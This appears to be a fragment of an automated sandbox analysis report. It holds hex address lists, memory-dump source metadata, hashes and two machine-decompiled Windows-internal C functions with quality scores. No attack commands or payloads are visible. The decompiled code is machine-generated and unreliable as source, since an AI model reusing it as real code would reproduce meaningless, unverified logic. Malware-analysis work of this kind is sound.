                                                                            0x010cd8f8
                                                                            0x010cd8f9
                                                                            0x010cd8fd
                                                                            0x0111b3e8
                                                                            0x0111b3e8
                                                                            0x0111b3eb
                                                                            0x0111b3ed
                                                                            0x00000000
                                                                            0x0111b3ef
                                                                            0x0111b3ef
                                                                            0x0111b3f1
                                                                            0x0111b3f4
                                                                            0x0111b3fe
                                                                            0x0111b404
                                                                            0x0111b409
                                                                            0x0111b40e
                                                                            0x0111b410
                                                                            0x0111b410
                                                                            0x0111b414
                                                                            0x0111b414
                                                                            0x0111b41b
                                                                            0x0111b420
                                                                            0x0111b423
                                                                            0x0111b425
                                                                            0x0111b427
                                                                            0x0111b42a
                                                                            0x0111b42d
                                                                            0x0111b42d
                                                                            0x0111b42a
                                                                            0x0111b432
                                                                            0x0111b436
                                                                            0x0111b438
                                                                            0x0111b43b
                                                                            0x0111b43b
                                                                            0x0111b449
                                                                            0x0111b44e
                                                                            0x0111b454
                                                                            0x0111b458
                                                                            0x0111b458
                                                                            0x0111b45d
                                                                            0x00000000
                                                                            0x0111b45d
                                                                            0x0111b3ed
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010cd7df
                                                                            0x010cd7d2
                                                                            0x010cd7ca
                                                                            0x0111b37c
                                                                            0x0111b37e
                                                                            0x0111b385
                                                                            0x0111b38a
                                                                            0x00000000
                                                                            0x0111b38a
                                                                            0x010cd742
                                                                            0x010cd7f1
                                                                            0x010cd7f8
                                                                            0x0111b49b
                                                                            0x0111b49b
                                                                            0x010cd800
                                                                            0x010cd837
                                                                            0x010cd843
                                                                            0x010cd845
                                                                            0x010cd847
                                                                            0x010cd84a
                                                                            0x010cd84b
                                                                            0x010cd84e
                                                                            0x010cd857
                                                                            0x010cd802
                                                                            0x010cd802
                                                                            0x010cd80d
                                                                            0x00000000
                                                                            0x010cd818
                                                                            0x010cd818
                                                                            0x010cd824
                                                                            0x010cd831
                                                                            0x0111b4a5
                                                                            0x0111b4ab
                                                                            0x0111b4b3
                                                                            0x0111b4b8
                                                                            0x0111b4bb
                                                                            0x00000000
                                                                            0x0111b4c1
                                                                            0x0111b4c1
                                                                            0x0111b4c8
                                                                            0x00000000
                                                                            0x0111b4ce
                                                                            0x0111b4d4
                                                                            0x0111b4e1
                                                                            0x0111b4e3
                                                                            0x0111b4e5
                                                                            0x00000000
                                                                            0x0111b4eb
                                                                            0x0111b4f0
                                                                            0x0111b4f2
                                                                            0x010cdac9
                                                                            0x010cdacc
                                                                            0x010cdacf
                                                                            0x010cdad1
                                                                            0x010cdd78
                                                                            0x010cdd78
                                                                            0x010cdcf2
                                                                            0x00000000
                                                                            0x010cdad7
                                                                            0x010cdad9
                                                                            0x010cdadb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010cdae1
                                                                            0x010cdae1
                                                                            0x010cdae4
                                                                            0x010cdae6
                                                                            0x0111b4f9
                                                                            0x0111b4f9
                                                                            0x0111b500
                                                                            0x010cdaec
                                                                            0x010cdaec
                                                                            0x010cdaf5
                                                                            0x010cdaf8
                                                                            0x010cdafb
                                                                            0x010cdb03
                                                                            0x010cdb11
                                                                            0x010cdb16
                                                                            0x010cdb19
                                                                            0x010cdb1b
                                                                            0x0111b52c
                                                                            0x0111b531
                                                                            0x0111b534
                                                                            0x010cdb21
                                                                            0x010cdb21
                                                                            0x010cdb24
                                                                            0x010cdcd9
                                                                            0x010cdce2
                                                                            0x010cdce5
                                                                            0x010cdd6a
                                                                            0x010cdd6d
                                                                            0x00000000
                                                                            0x010cdd73
                                                                            0x0111b51a
                                                                            0x0111b51c
                                                                            0x0111b51f
                                                                            0x0111b524
                                                                            0x00000000
                                                                            0x0111b524
                                                                            0x010cdce7
                                                                            0x010cdce7
                                                                            0x010cdce7
                                                                            0x00000000
                                                                            0x010cdce7
                                                                            0x00000000
                                                                            0x010cdb2a
                                                                            0x010cdb2c
                                                                            0x010cdb31
                                                                            0x010cdb33
                                                                            0x010cdb36
                                                                            0x010cdb39
                                                                            0x010cdb3b
                                                                            0x010cdb66
                                                                            0x010cdb66
                                                                            0x010cdb3d
                                                                            0x010cdb3d
                                                                            0x010cdb3e
                                                                            0x010cdb46
                                                                            0x010cdb47
                                                                            0x010cdb49
                                                                            0x010cdb4c
                                                                            0x010cdb53
                                                                            0x010cdb55
                                                                            0x010cdb58
                                                                            0x010cdb5a
                                                                            0x0111b50a
                                                                            0x0111b50f
                                                                            0x0111b512
                                                                            0x010cdb60
                                                                            0x010cdb60
                                                                            0x010cdb63
                                                                            0x010cdb63
                                                                            0x00000000
                                                                            0x010cdb63
                                                                            0x010cdb5a
                                                                            0x010cdb3b
                                                                            0x010cdb24
                                                                            0x010cdb69
                                                                            0x010cdb69
                                                                            0x010cdb6c
                                                                            0x010cdb6f
                                                                            0x010cdb74
                                                                            0x0111b557
                                                                            0x0111b557
                                                                            0x0111b55e
                                                                            0x010cdb7a
                                                                            0x010cdb7c
                                                                            0x010cdb7f
                                                                            0x010cdb82
                                                                            0x010cdb85
                                                                            0x00000000
                                                                            0x010cdb8b
                                                                            0x010cdb8b
                                                                            0x010cdb8d
                                                                            0x010cdb9b
                                                                            0x010cdb9b
                                                                            0x010cdb9d
                                                                            0x010cdba0
                                                                            0x010cdba2
                                                                            0x010cdba4
                                                                            0x010cdba7
                                                                            0x010cdba9
                                                                            0x010cdbae
                                                                            0x010cdbae
                                                                            0x010cdbb1
                                                                            0x010cdbb4
                                                                            0x010cdbb4
                                                                            0x010cdbb7
                                                                            0x010cdbba
                                                                            0x010cdcd2
                                                                            0x010cdcd4
                                                                            0x00000000
                                                                            0x010cdbc0
                                                                            0x010cdbc0
                                                                            0x010cdbd2
                                                                            0x010cdbd7
                                                                            0x010cdbda
                                                                            0x010cdbdd
                                                                            0x010cdbdf
                                                                            0x00000000
                                                                            0x010cdbe5
                                                                            0x010cdbe5
                                                                            0x010cdbee
                                                                            0x010cdbf1
                                                                            0x0111b541
                                                                            0x0111b544
                                                                            0x00000000
                                                                            0x0111b546
                                                                            0x0111b546
                                                                            0x00000000
                                                                            0x0111b546
                                                                            0x010cdbf7
                                                                            0x010cdbf7
                                                                            0x010cdbfd
                                                                            0x010cdbfd
                                                                            0x010cdbff
                                                                            0x010cdc0b
                                                                            0x010cdc15
                                                                            0x010cdc1b
                                                                            0x010cdc1d
                                                                            0x010cdc21
                                                                            0x010cdc21
                                                                            0x010cdc23
                                                                            0x010cdc23
                                                                            0x010cdc26
                                                                            0x010cdc29
                                                                            0x010cdc2b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010cdc31
                                                                            0x010cdc34
                                                                            0x010cdc36
                                                                            0x010cdcbf
                                                                            0x010cdcbf
                                                                            0x010cdcc2
                                                                            0x00000000
                                                                            0x010cdc3c
                                                                            0x010cdc41
                                                                            0x010cdc43
                                                                            0x00000000
                                                                            0x010cdc45
                                                                            0x010cdc45
                                                                            0x010cdc47
                                                                            0x00000000
                                                                            0x010cdc4d
                                                                            0x010cdc4d
                                                                            0x010cdc50
                                                                            0x010cdc52
                                                                            0x010cdc55
                                                                            0x010cdcfa
                                                                            0x010cdcfe
                                                                            0x010cdd08
                                                                            0x010cdd0a
                                                                            0x010cdd0c
                                                                            0x00000000
                                                                            0x010cdd12
                                                                            0x010cdd15
                                                                            0x010cdd2d
                                                                            0x010cdd2f
                                                                            0x010cdd32
                                                                            0x010cdd35

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 892299a9356cace3caf97db4c728a4dd36c007c5a11f947b3aaa21b3826aa3f3
                                                                            • Instruction ID: 66dbbe96c38e43b0c819b4e74c073ecbcd0399428d40479bf3421eb6ee8b1bc7
                                                                            • Opcode Fuzzy Hash: 892299a9356cace3caf97db4c728a4dd36c007c5a11f947b3aaa21b3826aa3f3
                                                                            • Instruction Fuzzy Hash: 73E1C130A04356CFEB299F68C884BADBBB2BF45B04F0441FDD98997291D734A985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
E010C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
    void* _t136;
    signed int _t139;
    signed int _t141;
    signed int _t145;
    intOrPtr _t146;
    signed int _t149;
    signed int _t150;
    signed int _t161;
    signed int _t163;
    signed int _t165;
    signed int _t169;
    signed int _t171;
    signed int _t194;
    signed int _t200;
    void* _t201;
    signed int _t204;
    signed int _t206;
    signed int _t210;
    signed int _t214;
    signed int _t215;
    signed int _t218;
    void* _t221;
    signed int _t224;
    signed int _t226;
    intOrPtr _t228;
    signed int _t232;
    signed int _t233;
    signed int _t234;
    void* _t237;
    void* _t238;

    _t236 = __esi;
    _t235 = __edi;
    _t193 = __ebx;
    _push(0x70);
    _push(0x118f9c0);
    E0110D0E8(__ebx, __edi, __esi);
    *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
    if( *0x11a7b04 == 0) {
        L4:
        goto L5;
    } else {
        _t136 = E010CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
        _t236 = 0;
        if(_t136 < 0) {
            *((intOrPtr*)(_t237 - 0x54)) = 0;
        }
        if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
            _t193 =  *( *[fs:0x30] + 0x18);
            *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
            *(_t237 - 0x68) = _t236;
            *(_t237 - 0x6c) = _t236;
            _t235 = _t236;
            *(_t237 - 0x60) = _t236;
            E010D2280( *[fs:0x30], 0x11a8550);
            _t139 =  *0x11a7b04; // 0x1
            __eflags = _t139 - 1;
            if(__eflags != 0) {
                _t200 = 0xc;
                _t201 = _t237 - 0x40;
                _t141 = E010EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                *(_t237 - 0x44) = _t141;
                __eflags = _t141;
                if(_t141 < 0) {
                    L50:
                    E010CFFB0(_t193, _t235, 0x11a8550);
                    L5:
                    return E0110D130(_t193, _t235, _t236);
                }
                _push(_t201);
                _t221 = 0x10;
                _t202 =  *(_t237 - 0x40);
                _t145 = E010B1C45( *(_t237 - 0x40), _t221);
                *(_t237 - 0x44) = _t145;
                __eflags = _t145;
                if(_t145 < 0) {
                    goto L50;
                }
                _t146 =  *0x11a7b9c; // 0x0
                _t235 = L010D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                *(_t237 - 0x60) = _t235;
                __eflags = _t235;
                if(_t235 == 0) {
                    _t149 = 0xc0000017;
                    *(_t237 - 0x44) = 0xc0000017;
                } else {
                    _t149 =  *(_t237 - 0x44);
                }
                __eflags = _t149;
                if(__eflags >= 0) {
                    L8:
                    *(_t237 - 0x64) = _t235;
                    _t150 =  *0x11a7b10; // 0x9
                    *(_t237 - 0x4c) = _t150;
                    _push(_t237 - 0x74);
                    _push(_t237 - 0x39);
                    _push(_t237 - 0x58);
                    _t193 = E010EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                    *(_t237 - 0x44) = _t193;
                    __eflags = _t193;
                    if(_t193 < 0) {
                        L30:
                        E010CFFB0(_t193, _t235, 0x11a8550);
                        __eflags = _t235 - _t237 - 0x38;
                        if(_t235 != _t237 - 0x38) {
                            _t235 =  *(_t237 - 0x48);
                            L010D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                        } else {
                            _t235 =  *(_t237 - 0x48);
                        }
                        __eflags =  *(_t237 - 0x6c);
                        if( *(_t237 - 0x6c) != 0) {
                            L010D77F0(_t235, _t236,  *(_t237 - 0x6c));
                        }
                        __eflags = _t193;
                        if(_t193 >= 0) {
                            goto L4;
                        } else {
                            goto L5;
                        }
                    }
                    _t204 =  *0x11a7b04; // 0x1
                    *(_t235 + 8) = _t204;
                    __eflags =  *((char*)(_t237 - 0x39));
                    if( *((char*)(_t237 - 0x39)) != 0) {
                        *(_t235 + 4) = 1;
                        *(_t235 + 0xc) =  *(_t237 - 0x4c);
                        _t161 =  *0x11a7b10; // 0x9
                        *(_t237 - 0x4c) = _t161;
                    } else {
                        *(_t235 + 4) = _t236;
                        *(_t235 + 0xc) =  *(_t237 - 0x58);
                    }
                    *((intOrPtr*)(_t237 - 0x54)) = E010F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                    _t224 = _t236;
                    *(_t237 - 0x40) = _t236;
                    *(_t237 - 0x50) = _t236;
                    while(1) {
                        _t163 =  *(_t235 + 8);
                        __eflags = _t224 - _t163;
                        if(_t224 >= _t163) {
                            break;
                        }
                        _t228 =  *0x11a7b9c; // 0x0
                        _t214 = L010D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                        *(_t237 - 0x78) = _t214;
                        __eflags = _t214;
                        if(_t214 == 0) {
                            L52:
                            _t193 = 0xc0000017;
                            L19:
                            *(_t237 - 0x44) = _t193;
                            L20:
                            _t206 =  *(_t237 - 0x40);
                            __eflags = _t206;
                            if(_t206 == 0) {
                                L26:
                                __eflags = _t193;
                                if(_t193 < 0) {
                                    E010F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                    __eflags =  *((char*)(_t237 - 0x39));
                                    if( *((char*)(_t237 - 0x39)) != 0) {
                                        *0x11a7b10 =  *0x11a7b10 - 8;
                                    }
                                } else {
                                    _t169 =  *(_t237 - 0x68);
                                    __eflags = _t169;
                                    if(_t169 != 0) {
                                        *0x11a7b04 =  *0x11a7b04 - _t169;
                                    }
                                }
                                __eflags = _t193;
                                if(_t193 >= 0) {
                                    *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                }
                                goto L30;
                            }
                            _t226 = _t206 * 0xc;
                            __eflags = _t226;
                            _t194 =  *(_t237 - 0x48);
                            do {
                                *(_t237 - 0x40) = _t206 - 1;
                                _t226 = _t226 - 0xc;
                                *(_t237 - 0x4c) = _t226;
                                __eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                    __eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                    if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                        *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                        _t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                        __eflags =  *((char*)(_t237 - 0x39));
                                        if( *((char*)(_t237 - 0x39)) == 0) {
                                            _t171 = _t210;
                                        } else {
                                            *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                            L010D77F0(_t194, _t236, _t210 - 8);
                                            _t171 =  *(_t237 - 0x50);
                                        }
                                        L48:
                                        L010D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                        L46:
                                        _t206 =  *(_t237 - 0x40);
                                        _t226 =  *(_t237 - 0x4c);
                                        goto L24;
                                    }
                                    *0x11a7b08 =  *0x11a7b08 + 1;
                                    goto L24;
                                }
                                _t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                __eflags = _t171;
                                if(_t171 != 0) {
                                    __eflags =  *((char*)(_t237 - 0x39));
                                    if( *((char*)(_t237 - 0x39)) == 0) {
                                        goto L48;
                                    }
                                    E010F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                    goto L46;
                                }
                                L24:
                                __eflags = _t206;
                            } while (_t206 != 0);
                            _t193 =  *(_t237 - 0x44);
                            goto L26;
                        }
                        _t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                        *(_t237 - 0x7c) = _t232;
                        *(_t232 - 4) = _t214;
                        *(_t237 - 4) = _t236;
                        E010FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                        _t238 = _t238 + 0xc;
                        *(_t237 - 4) = 0xfffffffe;
                        _t215 =  *(_t237 - 0x48);
                        __eflags = _t193;
                        if(_t193 < 0) {
                            L010D77F0(_t215, _t236,  *(_t237 - 0x78));
                            goto L20;
                        }
                        __eflags =  *((char*)(_t237 - 0x39));
                        if( *((char*)(_t237 - 0x39)) != 0) {
                            _t233 = E010EA44B( *(_t237 - 0x4c));
                            *(_t237 - 0x50) = _t233;
                            __eflags = _t233;
                            if(_t233 == 0) {
                                L010D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                goto L52;
                            }
                            *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                            L17:
                            _t234 =  *(_t237 - 0x40);
                            _t218 = _t234 * 0xc;
                            *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                            *(_t218 + _t235 + 0x10) = _t236;
                            _t224 = _t234 + 1;
                            *(_t237 - 0x40) = _t224;
                            *(_t237 - 0x50) = _t224;
                            _t193 =  *(_t237 - 0x44);
                            continue;
                        }
                        *(_t237 - 0x50) =  *(_t237 - 0x7c);
                        goto L17;
                    }
                    *_t235 = _t236;
                    _t165 = 0x10 + _t163 * 0xc;
                    __eflags = _t165;
                    _push(_t165);
                    _push(_t235);
                    _push(0x23);
                    _push(0xffffffff);
                    _t193 = E010F96C0();
                    goto L19;
                } else {
                    goto L50;
                }
            }
            _t235 = _t237 - 0x38;
            *(_t237 - 0x60) = _t235;
            goto L8;
        }
        goto L4;
    }
}

                                                                            0x010c85e6
                                                                            0x010c85ea
                                                                            0x010c86c3
                                                                            0x010c86c5
                                                                            0x010c86c8
                                                                            0x010c86ca
                                                                            0x01119b16
                                                                            0x00000000
                                                                            0x01119b16
                                                                            0x010c86d6
                                                                            0x010c85f6
                                                                            0x010c85f6
                                                                            0x010c85f9
                                                                            0x010c8602
                                                                            0x010c8606
                                                                            0x010c860a
                                                                            0x010c860b
                                                                            0x010c860e
                                                                            0x010c8611
                                                                            0x00000000
                                                                            0x010c8611
                                                                            0x010c85f3
                                                                            0x00000000
                                                                            0x010c85f3
                                                                            0x010c8619
                                                                            0x010c861e
                                                                            0x010c861e
                                                                            0x010c8621
                                                                            0x010c8622
                                                                            0x010c8623
                                                                            0x010c8625
                                                                            0x010c862c
                                                                            0x00000000
                                                                            0x010c873d
                                                                            0x00000000
                                                                            0x010c873d
                                                                            0x010c8737
                                                                            0x010c850f
                                                                            0x010c8512
                                                                            0x00000000
                                                                            0x010c8512
                                                                            0x00000000
                                                                            0x010c84d6

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b72d887bfc3f08ff97728bf834d74899cf4edbfb5ce6aae9650d7349909ce134
                                                                            • Instruction ID: 2dc49b896f7dc3a7cf827e76e9a35152c07a4b27f9b13fe3d2ea7025997530cd
                                                                            • Opcode Fuzzy Hash: b72d887bfc3f08ff97728bf834d74899cf4edbfb5ce6aae9650d7349909ce134
                                                                            • Instruction Fuzzy Hash: EBB15BB0E0020ADFDB29DFA9C984AEDFBB5BF48704F10812EE555AB245D770A941CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                                                                                  E010E513A(intOrPtr __ecx, void* __edx) { 				signed int _v8; 				signed char _v16; 				intOrPtr _v20; 				intOrPtr _v24; 				char _v28; 				signed int _v32; 				signed int _v36; 				signed int _v40; 				intOrPtr _v44; 				intOrPtr _v48; 				char _v63; 				char _v64; 				signed int _v72; 				signed int _v76; 				signed int _v80; 				signed int _v84; 				signed int _v88; 				signed char* _v92; 				signed int _v100; 				signed int _v104; 				char _v105; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* _t157; 				signed int _t159; 				signed int _t160; 				unsigned int* _t161; 				intOrPtr _t165; 				signed int _t172; 				signed char* _t181; 				intOrPtr _t189; 				intOrPtr* _t200; 				signed int _t202; 				signed int _t203; 				char _t204; 				signed int _t207; 				signed int _t208; 				void* _t209; 				intOrPtr _t210; 				signed int _t212; 				signed int _t214; 				signed int _t221; 				signed int _t222; 				signed int _t226; 				intOrPtr* _t232; 				signed int _t233; 				signed int _t234; 				intOrPtr _t237; 				intOrPtr _t238; 				intOrPtr _t240; 				void* _t245; 				signed int _t246; 				signed int _t247; 				void* _t248; 				void* _t251; 				void* _t252; 				signed int _t253; 				signed int _t255; 				signed int _t256;  				_t255 = (_t253 & 0xfffffff8) - 0x6c; 				_v8 =  *0x11ad360 ^ _t255; 				_v32 = _v32 & 0x00000000; 				_t251 = __edx; 				_t237 = __ecx; 				_t212 = 6; 				_t245 =  &_v84; 				_t207 =  *((intOrPtr*)(__ecx + 0x48)); 				_v44 =  *((intOrPtr*)(__edx + 0xc8)); 				_v48 = __ecx; 				_v36 = _t207; 				_t157 = memset(_t245, 0, _t212 << 2); 				_t256 = _t255 + 0xc; 				_t246 = _t245 + _t212; 				if(_t207 == 2) { 					_t247 =  *(_t237 + 0x60); 					_t208 =  *(_t237 + 0x64); 					_v63 =  *((intOrPtr*)(_t237 + 0x4c)); 					_t159 =  *((intOrPtr*)(_t237 + 0x58)); 					_v104 = _t159; 					_v76 = _t159; 					_t160 =  
*((intOrPtr*)(_t237 + 0x5c)); 					_v100 = _t160; 					_v72 = _t160; 					L19: 					_v80 = _t208; 					_v84 = _t247; 					L8: 					_t214 = 0; 					if( *(_t237 + 0x74) > 0) { 						_t82 = _t237 + 0x84; // 0x124 						_t161 = _t82; 						_v92 = _t161; 						while( *_t161 >> 0x1f != 0) { 							_t200 = _v92; 							if( *_t200 == 0x80000000) { 								break; 							} 							_t214 = _t214 + 1; 							_t161 = _t200 + 0x10; 							_v92 = _t161; 							if(_t214 <  *(_t237 + 0x74)) { 								continue; 							} 							goto L9; 						} 						_v88 = _t214 << 4; 						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78)); 						_t165 = 0; 						asm("adc eax, [ecx+edx+0x7c]"); 						_v24 = _t165; 						_v28 = _v40; 						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80)); 						_t221 = _v40; 						_v16 =  *_v92; 						_v32 =  &_v28; 						if( *(_t237 + 0x4e) >> 0xf == 0) { 							goto L9; 						} 						_t240 = _v48; 						if( *_v92 != 0x80000000) { 							goto L9; 						} 						 *((intOrPtr*)(_t221 + 8)) = 0; 						 *((intOrPtr*)(_t221 + 0xc)) = 0; 						 *((intOrPtr*)(_t221 + 0x14)) = 0; 						 *((intOrPtr*)(_t221 + 0x10)) = _v20; 						_t226 = 0; 						_t181 = _t251 + 0x66; 						_v88 = 0; 						_v92 = _t181; 						do { 							if( *((char*)(_t181 - 2)) == 0) { 								goto L31; 							} 							_t226 = _v88; 							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) { 								_t181 = E010FD0F0(1, _t226 + 0x20, 0); 								_t226 = _v40; 								 *(_t226 + 8) = _t181; 								 *((intOrPtr*)(_t226 + 0xc)) = 0; 								L34: 								if(_v44 == 0) { 									goto L9; 								} 								_t210 = _v44; 								_t127 = _t210 + 0x1c; // 0x1c 								_t249 = _t127; 								E010D2280(_t181, _t127); 								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24); 								_t185 =  *((intOrPtr*)(_t210 + 0x94)); 								if( *((intOrPtr*)(_t210 + 0x94)) != 0) { 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185); 								} 								_t189 = L010D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 
+ 0x10); 								 *((intOrPtr*)(_t210 + 0x94)) = _t189; 								if(_t189 != 0) { 									 *((intOrPtr*)(_t189 + 8)) = _v20; 									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16; 									_t232 =  *((intOrPtr*)(_t210 + 0x94)); 									 *_t232 = _t232 + 0x10; 									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000; 									E010FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20); 									_t256 = _t256 + 0xc; 								} 								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000; 								E010CFFB0(_t210, _t249, _t249); 								_t222 = _v76; 								_t172 = _v80; 								_t208 = _v84; 								_t247 = _v88; 								L10: 								_t238 =  *((intOrPtr*)(_t251 + 0x1c)); 								_v44 = _t238; 								if(_t238 != 0) { 									 *0x11ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20))); 									_v44(); 								} 								_pop(_t248); 								_pop(_t252); 								_pop(_t209); 								return E010FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252); 							} 							_t181 = _v92; 							L31: 							_t226 = _t226 + 1; 							_t181 =  &(_t181[0x18]); 							_v88 = _t226; 							_v92 = _t181; 						} while (_t226 < 4); 						goto L34; 					} 					L9: 					_t172 = _v104; 					_t222 = _v100; 					goto L10; 				} 				_t247 = _t246 | 0xffffffff; 				_t208 = _t247; 				_v84 = _t247; 				_v80 = _t208; 				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) { 					_t233 = _v72; 					_v105 = _v64; 					_t202 = _v76; 				} else { 					_t204 =  *((intOrPtr*)(_t251 + 0x4d)); 					_v105 = 1; 					if(_v63 <= _t204) { 						_v63 = _t204; 					} 					_t202 = _v76 |  *(_t251 + 0x40); 					_t233 = _v72 |  *(_t251 + 0x44); 					_t247 =  *(_t251 + 0x38); 					_t208 =  *(_t251 + 0x3c); 					_v76 = _t202; 					_v72 = _t233; 					_v84 = _t247; 					_v80 = _t208; 				} 				_v104 = _t202; 				_v100 = _t233; 				if( *((char*)(_t251 + 0xc4)) != 0) { 					_t237 = _v48; 					_v105 = 1; 					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) { 						_v63 =  *((intOrPtr*)(_t251 + 
0xc5)); 						_t237 = _v48; 					} 					_t203 = _t202 |  *(_t251 + 0xb8); 					_t234 = _t233 |  *(_t251 + 0xbc); 					_t247 = _t247 &  *(_t251 + 0xb0); 					_t208 = _t208 &  *(_t251 + 0xb4); 					_v104 = _t203; 					_v76 = _t203; 					_v100 = _t234; 					_v72 = _t234; 					_v84 = _t247; 					_v80 = _t208; 				} 				if(_v105 == 0) { 					_v36 = _v36 & 0x00000000; 					_t208 = 0; 					_t247 = 0; 					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0; 					goto L19; 				} else { 					_v36 = 1; 					goto L8; 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50948901d7136c28563c8cbaa9977ab7d9354afa81ccdf162e6b4838a8485e32
                                                                            • Instruction ID: 1ae946a2647ece1b121fd8c74d4c0b99fd70d59f656f68530c9da279e3679830
                                                                            • Opcode Fuzzy Hash: 50948901d7136c28563c8cbaa9977ab7d9354afa81ccdf162e6b4838a8485e32
                                                                            • Instruction Fuzzy Hash: 9DC101755083818FD358CF28C580A6AFBE1BF89308F144A6EF9D98B392D771E945CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
